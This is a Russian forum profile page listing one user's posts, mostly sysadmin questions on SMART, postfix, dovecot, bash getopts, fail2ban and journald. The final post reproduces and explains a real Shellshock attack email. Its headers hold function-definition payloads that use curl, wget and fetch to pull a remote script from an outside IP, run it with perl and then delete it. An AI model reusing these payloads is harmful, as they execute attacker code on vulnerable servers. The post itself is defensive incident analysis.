LINUX.ORG.RU

Сообщения sin_a

 

SMART (Raw_Read_Error_Rate) у Hitachi за raid контроллером

 , , ,

Смотрю SMART на Hitachi HUA722010CLA330 под LSI MegaRAID SAS 2208.

Значение Raw_Read_Error_Rate у одного из дисков подозрительно велико, у второго — единица. Через некоторое время посмотрел опять — у второго внезапно выросло также. Но ещё через некоторое время значение упало до нуля сначала у первого а затем у второго. Наверно я чего-то не понимаю, мне казалось что это счётчик который может только расти. Вот здесь пишут что raw values вообще читать не следует, потому что There is no standard for them. Some vendors pack several values into the same 32 bit word too. This leads to scary but harmless raw values. https://forum.ovh.co.uk/showthread.php?7905-Smart-Raw_Read_Error_Rate

Мне уже следует напрячься или пока наоборот, можно расслабиться, и кому верить^W^W на что тогда вообще смотреть? Это особенности накопителя или возможны наводки контроллера?

И чтобы два раза не вставать, такой вопрос. Положим отказал накопитель. Мне нужно извлечь неисправный и заменить его. Как мне определить который извлекать? В случае mdadm я мог зажечь лампочку, например забивая нулями. Есть ли возможность в случае raid контроллера идентифицировать накопитель лампочкой?

sin_a
()

postfix: reject_sender_login_mismatch не принимает письмо от владельца ящика

 

Возникло желание запретить windows машинам отправлять почту подставляя случайного отправителя. Возможно это уменьшит неуправляемые выбросы нежелательной почты. Для этого часто рекомендуют

smtpd_sender_restrictions = reject_sender_login_mismatch
Но у меня это правило блокирует почту от валидного пользователя.
5.7.1 <user@domain.ru>: Sender address rejected: not owned by user user@domain.ru
Включил более полное логирование, но это не дало более полного понимания:
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: >>> START Sender address RESTRICTIONS <<<
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: generic_checks: name=reject_sender_login_mismatch
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: >>> START Sender address RESTRICTIONS <<<
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: generic_checks: name=reject_authenticated_sender_login_mismatch
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: ctable_locate: leave existing entry key user@domain.ru
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: maps_find: smtpd_sender_login_maps: user@domain.ru: not found
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: match_string: domain.ru ~? mail.domain.ru
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: match_string: domain.ru ~? localhost.domain.ru
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: match_string: domain.ru ~? localhost
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: match_string: domain.ru ~? domain.ru
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: maps_find: smtpd_sender_login_maps: user: not found
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: maps_find: smtpd_sender_login_maps: @domain.ru: not found
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: mail_addr_find: user@domain.ru -> (not found)
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: NOQUEUE: reject: RCPT from unknown[192.168.1.1]: 553 5.7.1 <user@domain.ru>: Sender address rejected: not owned by user user@domain.ru; from=<user@domain.ru> to=<user@domain.ru> proto=ESMTP helo=<[192.168.1.122]>
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: generic_checks: name=reject_authenticated_sender_login_mismatch status=2
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: >>> END Sender address RESTRICTIONS <<<
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: generic_checks: name=reject_sender_login_mismatch status=2
Aug 26 14:09:24 mail.domain.ru postfix/smtpd[403]: >>> END Sender address RESTRICTIONS <<<

Как можно понять что ему мешает? Не может это быть связано с тем, что пользователи хранятся в SQL?

sin_a
()

Что происходит при doveadm mailbox list -A?

 

У меня при этом выходит следующее:

[root@mail mail]# doveadm mailbox list -A
doveadm(systemd-bus-proxy): Error: user systemd-bus-proxy: Initialization failed: Namespace '': mkdir(//mailboxes) failed: Permission denied (euid=999(systemd-bus-proxy) egid=997(systemd-bus-proxy) missing +w perm: /, dir owned by 0:0 mode=0555)
doveadm(systemd-bus-proxy): Error: User init failed
doveadm(systemd-network): Error: user systemd-network: Initialization failed: Namespace '': mkdir(//mailboxes) failed: Permission denied (euid=998(systemd-network) egid=996(systemd-network) missing +w perm: /, dir owned by 0:0 mode=0555)
doveadm(systemd-network): Error: User init failed
doveadm(dovenull): Error: user dovenull: Initialization failed: Namespace '': mkdir(/usr/libexec/dovecot/mailboxes) failed: Permission denied (euid=997(dovenull) egid=995(dovenull) missing +w perm: /usr/libexec/dovecot, dir owned by 0:0 mode=0755)
doveadm(dovenull): Error: User init failed
vmail Drafts
vmail Junk
vmail Trash
vmail Sent
vmail INBOX
doveadm(postgrey): Error: chown(/var/spool/postfix/postgrey/mailboxes, group=89(postfix)) failed: Operation not permitted (egid=994(postgrey), group based on /var/spool/postfix/postgrey - see http://wiki2.dovecot.org/Errors/ChgrpNoPerm)
doveadm(postgrey): Error: user postgrey: Initialization failed: Namespace '': mkdir(/var/spool/postfix/postgrey/mailboxes) failed: Operation not permitted
doveadm(postgrey): Error: User init failed
doveadm(postgrey): Error: User listing returned failure
doveadm: Error: Failed to iterate through some users
[root@mail mail]#

Такое впечатление, что он перебирает неких локальных пользователей (systemd-bus-proxy, systemd-network, dovenull, postgrey) и для них пытается выполнить list. Соответственно, два вопроса: как отговорить его смотреть локальных и как обучить его брать виртуальных?

Собственно несложно получить список пользователей самому и выполнять для каждого в списке, но это выглядит не совсем правильным. «Не по феншую».

sin_a
()

Доступ к гостю с гипервизора

 ,

В openvz есть возможность получать шелл в контейнере с hardware node напрямую. То есть, в контейнере может не быть ни одной учётной записи, отключен root, нет ssh и даже нет сети. Возможно ли такое в других средствах виртуализации, например в kvm?

Может быть не смог правильно составить запрос, но в поиске не нашёл ничего по этому вопросу.

sin_a
()

bash, getopts

 ,

Если задать для getopts несколько параметров но при вызове пропустить значения, то для для предыдущего параметра значением будет название следующего:

$ cat bin/testbash.sh 
#!/bin/bash
#

aaa=
bbb=
ccc=
ddd=

while getopts ":a:b:c:d:" scriptopt
do
    case "${scriptopt}" in
       a)
           aaa="${OPTARG}"
       ;;
       b)
           bbb="${OPTARG}"
       ;;
       c)
           ccc="${OPTARG}"
       ;;
       d)
           ddd="${OPTARG}"
       ;;
       :)
           echo "Error"
           exit 1
       ;;
    esac
done

echo "
${aaa}
${bbb}
${ccc}
${ddd}
"
$ testbash.sh -a 111 -b 222 -c 333 -d 444

111
222
333
444

$ testbash.sh -a 111 -b 222 -c 
Error
$ testbash.sh -a 111 -b 222 -c -d 

111
222
-d


$ 

В принципе это не смертельно, но может я просто чего не понимаю?

sin_a
()

Не могу понять лог fail2ban

 

В пустой системе запущен fail2ban и sshd. Через некоторое время fail2ban срабатывает. При этом в логе secure появляются записи о попытке авторизации:

( читать дальше... )

Одновременно с этим в логе fail2ban появляется довольно много записей на первый взгляд не относящихся к этому событию:

( читать дальше... )

То есть, fail2ban резолвит некие IP адреса. Мне не совсем понятно зачем он это делает и откуда он их берёт. Если это по делу то почему бы их не забанить заодно, если ни о чём то зачем он этим занимается? Вызывает сомнение то, что события идут почти одновременно.

sin_a
()

systemd, journald и объём логов

 ,

Новые времена, новые веяния, новые технологии, бинарные логи, серьёзная магия. Скажите пожалуйста, это нормально?

# du -sh /var/log/journal/
4.0G   /var/log/journal/
И как теперь с этим принято жить?

Это centos7, настройки как мне кажется из коробки (по крайней мере не помню чтобы я касался в системе чего либо кроме требуемого ПО).

sin_a
()

slappasswd: как это работает?

 , , slappasswd

Утилита slappasswd позволяет сгенерировать пароль, который далее можно использовать. При этом его можно солить или не солить. Результат конечно разный, без соли он неизменный, а с солью естественно меняется:

slappasswd -v -h {SHA} -s 123
{SHA}QL0AFWMIX8NRZTKeof9cXsvbvu8=

slappasswd -v -h {SHA} -s 123
{SHA}QL0AFWMIX8NRZTKeof9cXsvbvu8=

slappasswd -v -h {SSHA} -s 123
{SSHA}ALrzFTOK9O2xUxO/qkHGJZ7sMLfSCnA2

slappasswd -v -h {SSHA} -s 123
{SSHA}L1K5N1DrrFGpQyTakjHbzefyikX8puuF

Если такой посоленный пароль поместить в конфиг, то система сможет с ним работать.

Но мы получили каждый раз разные хеши. То есть соль была различной. При этом мы не задаём и затем не указываем в конфиге соль. То есть при проверке система возьмёт пароль, приложит неизвестное нечто, получит хеш и сравнит тем что хранится. Разве хеш не должен совпасть только в том случае если мы используем одну и ту же соль?

Как это работает? Соль содержится в солёном хеше?

sin_a
()

Собрать компьютер

 ,

Есть необходимость собрать компьютер для домашних бытовых задач. В первом приближении задачи следующие:

  • «Десктоп»
    • Интернет
    • Мультимедия (соответственно желательна малошумность)
  • Графика
    • Gimp
    • Mypaint
    • Inkscape
    • Может быть blender
  • Игры
    • Дуалбут
    • Wine

Если игры будут идти в wine то это очень хорошо, но запасной аэродром в виде офтопика обязателен. Под играми понимается в первую очередь Assassin’s Creed, но на что ещё ориентироваться не знаю. Соответственно есть ряд вопросов.

( читать дальше... )

PS: Результат: Собрал компьютер

sin_a
()

http+html вместо страницы

 , ,

Обратились с жалобой что страница не всегда отдаётся нормально. Иногда браузер отображает страницу, а иногда вместо этого или пусто или вывод следующего характера:

Date: ...
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.16
Conection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset="utf-8

26b8
<!DOCTYPE html>
<html lang="ru">
<head>
	<meta charset="utf-8">
	...

Скриншот: https://img-fotki.yandex.ru/get/6611/22277664.3/0_a4f78_57a58bfe_orig , на скриншоте хром.

То есть, браузер выводит сначала вывод http и затем вывод html. То же, что можно получить обратившись телнетом, с некоторыми отличиями:

$ telnet site.ru 80
Trying 1.2.3.4...
Connected to site.ru.
Escape character is '^]'.
GET / HTTP/1.0
host:site.ru

HTTP/1.1 200 OK
Date: Sat, 09 Jan 2016 09:52:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.16
Content-Length: 5876
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="ru">
<head>  
        <meta charset="utf-8">

Жалоба была только на один сайт на хосте, и то который только сдаётся, в эксплуатации ещё не был. То есть какой либо статистики нет. Заметной загрузки на момент жалобы не наблюдалось.

В какую сторону стоит смотреть? Может быть в первом случае (из жалобы) что то неправильно в http заголовках?

sin_a
()

Машина Судного дня решит проблему космического мусора

 planetes

Недоотдел остался без работы?

http://mir24.tv/news/Science/13634700

sin_a
()

Cyanogen всё?

 , cortana, ,

Ведёт переговоры с Cyanogen по поводу включения своего голосового помощника в состав операционной системы Cyanogen OS.

http://www.3dnews.ru/920104/

sin_a
()

День победы

В некоторых странах знают и чтят свою историю. Например во Франции до сих пор отмечают день взятия Бастилии. Хотя это событие старше чем октябрьская революция в нашей, о которой у нас уже и позабыли все, а поди-ж ты, до сих пор помнят.

В нашей стране семьдесят лет назад тоже произошло историческое событие. Да так, что до сих пор у некоторых личностей пригорает. Вероятно они хотели бы чтобы это событие произошло наоборот.

Могу пожелать этим личностям только немного душевного спокойствия. Душевное спокойствие это очень важно в нашем бурном мире.

А всех остальных поздравляю с праздником.

sin_a
()

Теги

 ,

Если при заполнении формы заполнить поле тега и нажать ввод то сообщение отправится.

Это ошибка или так было задумано? Возможно было бы лучше отправлять как при обычном редактировании, по Ctrl+Enter.

sin_a
()

Знаете ли вы:

 

какое значение имеет слово Система_Д?

sin_a
()

Гугль опоздал...

 ,

Гугль сделали: https://play.google.com/store/apps/details?id=com.google.samples.apps.cardboa...

Но запатентовать не успели: http://tass.ru/ekonomika/1775379

sin_a
()

фильтрация в трекере

 ,

можно добавить к фильтрам трекера «без клуба»?

sin_a
()

А что популярнее, хоббиты или Симпсоны?

 хоббиты

Вот мне кажется что надо на той башне надувного Симпсона поставить. А выкак считаете?

sin_a
()

cacti: сдвиг графиков

 ,

После перевода времени все графики в какти сдвинулись на час. Выглядит это так: http://img-fotki.yandex.ru/get/5101/22277664.3/0_9c35d_6796ce33_orig . График рисуется правильно, но с отставанием.

В системе время и часовой пояс указаны правильно, в php также. Последний проверен, как из командной строки так и через веб сервер, следующим, найденным на просторах интернет, скриптом:

<?php
  echo "date - ".date("H:i");
  echo "\n <br> \n";
  echo "UTC date - ".gmdate("H:i");
  echo "\n <br> \n";
  $a = localtime();
  echo "localtime - ".$a[2].":".$a[1];
  echo "\n <br> \n";

  echo "Set timezone to Europe/Moscow\n";
  date_default_timezone_set("Europe/Moscow");

  echo "date - ".date("H:i");
  echo "\n <br> \n";
  echo "UTC date - ".gmdate("H:i");
  echo "\n <br> \n";
  $a = localtime();
  echo "localtime - ".$a[2].":".$a[1];
  echo "\n <br> \n";
  echo date_default_timezone_get();
?>

Вывод в браузере:

date - 10:47
UTC date - 07:47
localtime - 10:47
Set timezone to Europe/Moscow date - 10:47
UTC date - 07:47
localtime - 10:47
Europe/Moscow

Вывод при запуске вручную аналогичный.

На хосте с MySQL время также указано правильно, сам MySQL перезапущен. В частности например если в mediawiki внести правку то время правки будет верное.

Crontab также перезапущен и проверен. Его задания выполняются с правильным временем.

По видимому, проблема связана с rrd. Или при внесении туда данных, или при получении их оттуда. Но где ещё поискать — что то не могу представить...

sin_a
()

Пример эксплуатации недавней уязвимости в bash

Несколько дней назад обнаружил письмо, в котором явно делалась попытка проэксплуатировать недавнюю уязвимость в bash. По видимому, атака рассчитана на работу фильтров, в качестве которых могут быть shell скрипты.

Исходный вид письма:

From - Fri Oct 24 20:38:48 2014
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: by mail.my.domain.name.net (Postfix)
        id 1B8E6306033C; Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: by mail.my.domain.name.net (Postfix, from userid 1001)
        id 055493060D8A; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from sub.domain.my.domain.name.net (unknown [11.22.33.44])
        by mail.my.domain.name.net (Postfix) with ESMTP id D3496306033C
        for <root@mail.my.domain.name.net>; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id s9OGPr2d018507
        for <root@localhost>; Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
To: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;

В более удобочитаемом виде:

Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: 
        by mail.my.domain.name.net (Postfix)
        id 1B8E6306033C; 
        Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: 
        by mail.my.domain.name.net (Postfix, from userid 1001)
        id 055493060D8A; 
        Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: 
        from sub.domain.my.domain.name.net (unknown [11.22.33.44])
        by mail.my.domain.name.net (Postfix) with ESMTP 
        id D3496306033C
        for <root@mail.my.domain.name.net>; 
        Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: 
        from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP 
        id s9OGPr2d018507
        for <root@localhost>; 
        Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>

Здесь мы можем видеть малоинформативный support@mata.com и не намного более информативный u16850951.onlinehome-server.com [74.208.184.251], с которого было отправлено письмо.

Заголовки:

To:
From:
Resent-From:

содержат следующее:

To: () {:;;};
        cd/tmp;
        curl.-sO.178.254.31.165/ex.txt;
        lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;

Здесь мы можем видеть 178.254.31.165/ на котором файла ex.txt конечно уже не было.

Заголовки:

References:
Subject:
Date:
Message-ID:
Comments:
Keywords:
Resent-Date:

содержат предыдущий случай, без добавленного к url домена:

References:() { :; }; 
        cd /tmp ;
        curl -sO 178.254.31.165/ex.txt;
        lwp-download http://178.254.31.165/ex.txt;
        wget 178.254.31.165/ex.txt;
        fetch 178.254.31.165/ex.txt;
        perl ex.txt;
        rm -fr ex.*;

Перемещено beastie из admin

sin_a
()